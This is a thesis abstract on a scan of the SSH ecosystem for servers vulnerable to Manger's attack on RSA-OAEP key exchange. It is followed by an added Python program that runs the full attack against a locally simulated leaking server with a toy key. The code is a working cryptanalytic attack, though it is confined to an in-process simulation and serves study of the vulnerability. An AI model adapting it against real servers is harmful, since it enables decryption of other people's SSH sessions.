MA: Evaluating the Impact of Manger’s Attack on the SSH Ecosystem

Abstract:

Secure Shell (SSH) is a widely used cryptographic protocol that provides, among other properties, confidentiality for the messages exchanged between a client and a server. To achieve this confidentiality, key material has to be agreed upon over the internet, an insecure channel. One method of establishing key material in SSH-2 is the Rivest-Shamir-Adleman (RSA) key exchange. It relies on the encryption scheme RSAES-OAEP, which is built on Optimal Asymmetric Encryption Padding (OAEP). This key exchange requires an RSA public key, referred to as the transient public key, which the client uses to encrypt a shared secret from which the key material is derived. In 2001, an attack against RSAES-OAEP, known as Manger’s attack, was discovered that can decrypt a message encrypted with RSAES-OAEP. The attack requires an oracle that, given a ciphertext, tells the attacker whether or not the RSA decryption of that ciphertext starts with a 00 byte. Applied to SSH, the attack can recover the shared secret and hence the key material of a connection, enabling an attacker to decrypt all messages exchanged during that connection. Although the attack has been known for over 20 years, no large-scale analysis has been performed to find out whether vulnerable servers exist in the SSH ecosystem. In this thesis, we present an extensible scanning framework for SSH, a novelty for the SSH ecosystem. We use this framework to implement a server scanner that runs tests against a server to determine whether it has the properties required to be vulnerable to Manger’s attack. To validate these tests, we build vulnerable servers with different kinds of oracles using the open-source SSH framework AsyncSSH. Furthermore, we use the server scanner to perform a complete scan of the IPv4 address space on the default SSH port, port 22, and on one additional port, port 7547, on which public SSH servers were discovered.
In our analysis, we did not discover any servers that have the oracle required to execute Manger’s attack. We did, however, find hosts that reuse the transient public key across multiple RSA key exchanges, and some that use their host key for the key exchange. Neither finding leads to an immediate attack, but both pose a security risk: if the private key belonging to such a reused transient public key is compromised, every shared secret that was encrypted to it can be recovered.
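The oracle described in the abstract is, on its own, enough to recover the encrypted shared secret. The following Python program is an added example, not code from the thesis or its scanning framework: it generates a toy 256-bit RSA key in-process, stands up a simulated server that leaks only whether the decryption of a ciphertext starts with a 00 byte, and runs the three steps of Manger’s attack against it to recover a constructed OAEP-like encoded message. The key size, the seeded random generator, the simplified encoded message (a leading 00 byte followed by random bytes in place of a real OAEP masking) and all function and class names are assumptions of the example.

```python
"""Manger's attack against an RSAES-OAEP '00 byte' oracle, simulated locally.

Added example, not code from the thesis. Assumptions: a toy 256-bit RSA key
generated here, a simulated server that leaks only whether the decrypted
value starts with a 0x00 byte (i.e. is < B = 2^(8(k-1))), and a constructed
OAEP-like encoded message (0x00 || random bytes) in place of real OAEP.
"""
import math
import random

rng = random.Random(2001)  # seeded so the run is reproducible


def is_probable_prime(n, rounds=24):
    """Miller-Rabin primality test with bases drawn from the seeded RNG."""
    if n < 2:
        return False
    for sp in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % sp == 0:
            return n == sp
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(rng.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def gen_prime(bits):
    """Random prime with its top two bits set, so p*q has exactly 2*bits bits."""
    while True:
        cand = rng.getrandbits(bits) | (3 << (bits - 2)) | 1
        if is_probable_prime(cand):
            return cand


def keygen(bits=256, e=65537):
    """Toy RSA key (n, e, d); n has exactly `bits` bits, so 2B < n holds."""
    while True:
        p, q = gen_prime(bits // 2), gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and math.gcd(e, phi) == 1:
            return p * q, e, pow(e, -1, phi)  # modular inverse needs Python >= 3.8


class OracleServer:
    """Stand-in for a vulnerable server: the only thing it leaks is whether
    the RSA decryption of a ciphertext has a leading 0x00 byte."""

    def __init__(self, n, d):
        self.n, self.d = n, d
        k = (n.bit_length() + 7) // 8
        self.B = 1 << (8 * (k - 1))
        self.queries = 0

    def leading_byte_is_zero(self, c):
        self.queries += 1
        return pow(c, self.d, self.n) < self.B


def ceil_div(a, b):
    return -(-a // b)


def manger_attack(n, e, c, oracle):
    """Recover m = c^d mod n using only oracle(c') = [c'^d mod n < B].

    Follows the three steps of Manger (CRYPTO 2001). Each query sends
    c * f^e mod n, which the server decrypts to f*m mod n.
    """
    k = (n.bit_length() + 7) // 8
    B = 1 << (8 * (k - 1))
    assert 2 * B < n, "attack as written needs 2B < n"

    def lt_B(f):
        return oracle(c * pow(f, e, n) % n)

    # Step 1: double f1 until f1*m crosses B, so f1*m lies in [B, 2B).
    f1 = 2
    while lt_B(f1):
        f1 *= 2
    # Step 2: step f2 forward by f1/2 until f2*m wraps past n into [n, n+B).
    half = f1 // 2
    f2 = ((n + B) // B) * half
    while not lt_B(f2):
        f2 += half
    # Step 3: m lies in [ceil(n/f2), floor((n+B)/f2)]; shrink that interval
    # with each query by choosing f3 so that f3*m straddles i*n + B.
    m_min, m_max = ceil_div(n, f2), (n + B) // f2
    while m_min < m_max:
        f_tmp = (2 * B) // (m_max - m_min)
        i = (f_tmp * m_min) // n
        f3 = ceil_div(i * n, m_min)
        if lt_B(f3):
            m_max = (i * n + B) // f3
        else:
            m_min = ceil_div(i * n + B, f3)
    return m_min


def demo(bits=256):
    """Encrypt a constructed OAEP-like block, then recover it via the oracle."""
    n, e, d = keygen(bits)
    k = (n.bit_length() + 7) // 8
    # Constructed stand-in for an OAEP-encoded message: only its leading 0x00
    # byte matters to the attack; the rest would be maskedSeed || maskedDB.
    em = b"\x00" + bytes(rng.getrandbits(8) for _ in range(k - 1))
    m = int.from_bytes(em, "big")
    assert m > 0
    c = pow(m, e, n)
    server = OracleServer(n, d)
    recovered = manger_attack(n, e, c, server.leading_byte_is_zero)
    return m, recovered, server.queries


if __name__ == "__main__":
    m, recovered, queries = demo()
    print(f"recovered == m: {recovered == m}, oracle queries: {queries}")
```

In a real deployment the oracle is whatever observable difference (in error handling, disconnect behaviour or timing) a server exhibits between ciphertexts whose decryption does and does not start with a 00 byte; here the simulated server exposes that bit directly so the arithmetic of the attack can be checked in isolation. The number of queries grows roughly with the bit length of the modulus, which is what makes the attack practical against a live server once such a distinguishing behaviour exists.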